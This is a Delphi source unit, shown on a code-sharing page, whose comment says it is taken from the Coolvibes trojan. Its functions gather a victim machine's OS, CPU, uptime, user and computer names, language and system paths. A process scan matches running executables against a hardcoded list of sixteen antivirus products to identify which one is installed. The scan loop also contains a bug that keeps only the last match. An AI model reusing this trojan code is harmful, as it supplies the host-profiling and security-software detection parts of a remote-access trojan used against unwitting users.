📄 unitinformaciondelsistema.pas
字号:
//Unit que contiene las funciones para sacar informacion del
//pc. Estas funciones estan extraidas del troyano Coolvibes.
unit UnitInformacionDelSistema;
interface
uses
Windows,
SysUtils,
registry,
TLHelp32;
const
cadenaDeProcesos : array[0..15] of string = ('avesvc.exe',
'ashdisp.exe',
'avgcc.exe',
'bdss.exe',
'spider.exe',
'avp.exe',
'nod32krn.exe',
'cclaw.exe',
'dvpapi.exe',
'ewidoctrl.exe',
'mcshield.exe',
'pavfires.exe',
'almon.exe',
'ccapp.exe',
'pccntmon.exe',
'fssm32.exe');
nombreDeAvs : array[0..15] of string = ('AntiVir',
'Avast Antivirus',
'AVG Antivirus',
'BitDefender',
'Dr.Web',
'Kaspersky Antivirus',
'Nod32',
'Norman',
'Authentium Antivirus',
'Ewido Security Suite',
'McAfee VirusScan',
'Panda Antivirus/Firewall',
'Sophos',
'Symantec/Norton',
'PC-cillin Antivirus',
'F-Secure');
function DameClave(key:Hkey; subkey,nombre:String):String;
function DameElSistemaOperativo(): String;
function DameLaCPU():String;
function DameElTiempoActivo():String;
function DameElPutoUserName : String;
function DameElNameComputer : String;
function DameDiaYHora: String;
function IdiomaDelUsuario:string;
function GetSysDir: string;
function GetWinDir: String;
function KieroElAv(): string;
Function Scan(Tipo: integer): string;
Function LowerCase(Const S: String): String;
implementation
function DameClave(key:Hkey; subkey,nombre:String):String;
var
bytesread:dword;
regKey: HKEY;
valor:String;
begin
Result:='';
RegOpenKeyEx(key,PChar(subkey),0, KEY_READ, regKey);
RegQueryValueEx(regKey,PChar(nombre),nil,nil,nil,@bytesread);
SetLength(valor, bytesread);
if RegQueryValueEx(regKey,PChar(nombre),nil,nil,@valor[1],@bytesread)=0 then
result:=valor;
RegCloseKey(regKey);
end;
function DameElSistemaOperativo(): String;
var
osVerInfo: TOSVersionInfo;
begin
Result:='Desconocido';
osVerInfo.dwOSVersionInfoSize:=SizeOf(TOSVersionInfo);
GetVersionEx(osVerInfo);
case osVerInfo.dwPlatformId of
VER_PLATFORM_WIN32_NT: begin
case osVerInfo.dwMajorVersion of
4: Result:='Windows NT 4.0';
5: case osVerInfo.dwMinorVersion of
0: Result:='Windows 2000';
1: Result:='Windows XP';
2: Result:='Windows Server 2003';
end;
6: Result:='Windows Vista';
end;
end;
VER_PLATFORM_WIN32_WINDOWS: begin
case osVerInfo.dwMinorVersion of
0: Result:='Windows 95';
10: Result:='Windows 98';
90: Result:='Windows Me';
end;
end;
end;
if osverinfo.szCSDVersion <> '' then
begin
result := result + ' ' + osverinfo.szCSDVersion;
end;
end;
function DameLaCPU():String;
begin
//Trim quita los espacios antes y despues de la cadena, ejem " CPU p6 2000 " , con trim "CPU p6 2000"
Result := Trim(DameClave(HKEY_LOCAL_MACHINE, 'HARDWARE\DESCRIPTION\System\CentralProcessor\0', 'ProcessorNameString'));
end;
function DameElTiempoActivo():String;
var
tempo, dayss, horss, minuete: Cardinal;
begin
tempo := GetTickCount();
dayss := tempo div (1000 * 60 * 60 * 24);
tempo := tempo - dayss * (1000 * 60 * 60 * 24);
horss := tempo div (1000 * 60 * 60);
tempo := tempo - horss * (1000 * 60 * 60);
minuete:= tempo div (1000 *60);
Result := IntToStr(dayss) + 'd ' + IntToStr(horss) + 'h ' + IntToStr(minuete) + 'm';
end;
function DameElPutoUserName : String;
var
pcUser : PChar;
dwUSize : DWORD;
begin
dwUSize := 21;
GetMem( pcUser, dwUSize );
try
if Windows.GetUserName( pcUser, dwUSize ) then
Result := pcUser
finally
FreeMem( pcUser );
end;
end;
function DameElNameComputer : String;
var
pcComputer : PChar;
dwCSize : DWORD;
begin
dwCSize := MAX_COMPUTERNAME_LENGTH + 1;
GetMem( pcComputer, dwCSize );
try
if Windows.GetComputerName( pcComputer, dwCSize ) then
Result := pcComputer;
finally
FreeMem( pcComputer );
end;
end;
function DameDiaYHora: String;
var
stSystemTime : TSystemTime;
begin
Windows.GetLocalTime( stSystemTime );
Result := DateTimeToStr( SystemTimeToDateTime( stSystemTime ) );
end;
function IdiomaDelUsuario:string;
var
IdiomaID:LangID;
Idioma: array [0..100] of char;
begin
IdiomaID:=GetUserDefaultLangID;
VerLanguageName(IdiomaID,Idioma,100);
Result:=String(Idioma);
end;
function GetSysDir: string;
var
SysDir: PChar;
begin
GetMem(SysDir, 144);
GetSystemDirectory(SysDir, 144);
Result := StrPas(SysDir);
FreeMem(SysDir, 144);
end;
function GetWinDir: String;
var
WinDir: PChar;
begin
GetMem(WinDir, 144);
GetWindowsDirectory(WinDir, 144);
Result := StrPas(WinDir);
FreeMem(WinDir, 144);
end;
function KieroElAv(): string;
begin
Result := Scan(1);
end;
Function Scan(tipo: integer): string;
Var
cLoop :Boolean;
procesos :THandle;
L :TProcessEntry32;
i :integer;
obtavs :string;
Begin
obtavs := '';
procesos := CreateToolHelp32SnapShot(TH32CS_SNAPPROCESS or TH32CS_SNAPMODULE, 0);
L.dwSize := SizeOf(L);
cLoop := Process32First(procesos, L);
while (Integer(cLoop) <> 0) do begin
if tipo = 1 then begin
for i := 0 to 15 do begin
if LowerCase(L.szExeFile) = cadenaDeProcesos[i] then
obtavs := nombreDeAvs[i] + #13#10;
end;
end;
cLoop := Process32Next(procesos, L);
end;
CloseHandle(procesos);
Delete(obtavs, Length(obtavs) - 1, 2);
Result := obtavs;
end;
function LowerCase(const S: string): string;//Convertir mayus y minusculas
var
Ch :char;
L :integer;
Source :pchar;
Dest :pchar;
begin
L := Length(S);
SetLength(Result, L);
Source := Pointer(S);
Dest := Pointer(Result);
while (L <> 0) do
begin
Ch := Source^;
if (Ch >= 'A') and (Ch <= 'Z') then
Inc(Ch, 32);
Dest^ := Ch;
Inc(Source);
Inc(Dest);
Dec(L);
end;
end;
end.
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -